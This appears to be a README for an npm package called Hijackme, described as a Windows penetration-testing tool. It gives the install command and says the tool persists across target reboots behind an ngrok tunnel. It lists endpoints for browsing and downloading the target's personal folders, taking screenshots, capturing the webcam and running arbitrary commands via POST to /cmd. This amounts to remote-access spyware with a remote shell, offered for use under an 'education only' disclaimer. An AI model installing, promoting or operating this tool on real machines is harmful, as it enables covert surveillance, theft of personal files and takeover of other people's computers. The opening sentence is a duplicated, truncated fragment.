Hijackme is the **cyber security** tool , designed for pentration testing. The tool provides a powerful interface for you to do pentration testing in the target system. The tool has following features - Screenshots - Documents trivalsal - Document do
Hijackme is the cyber security tool , designed for pentration testing. The tool provides a powerful interface for you to do pentration testing in the target system. The tool has following features
- Screenshots
- Documents trivalsal
- Document downloading
- Webcam access
- Script execution in target pc
This tool is designed only for education purpose only, I am not responsible for any illegal activity
As of today, the tool is only limited to Windows only .
npm i -g @arex21/hijackme
Setup the host
You first need to get your token from Ngrok Dashboard
hijackme <ngrok_token>
or simply you can run
npm i -g @arex21/hijackme && hijackme <ngrok_token>
And wait for target pc to restart, whenever the machine start, everytime, you will get the ngrok session, you can get Live NGROK Endpoints
Hijackme provides easy to use interface to performe cyber tasks, here is the example ,
https://b90d-119-73-112-157.ngrok-free.app/ ## Assume this is your Endpoint
The routes are
/explore/<Documents/Downloads/Pictures/Music> (You are able to explore content in these allowed directories, you are also able to download content
/screenshot/:quality> Take screenshot of the host,Where quality range from 1-100
/capture/:quality Access webcam , Where quality range from 1-100
/cmd To execute the command, It is POST request , the body is {"command": string}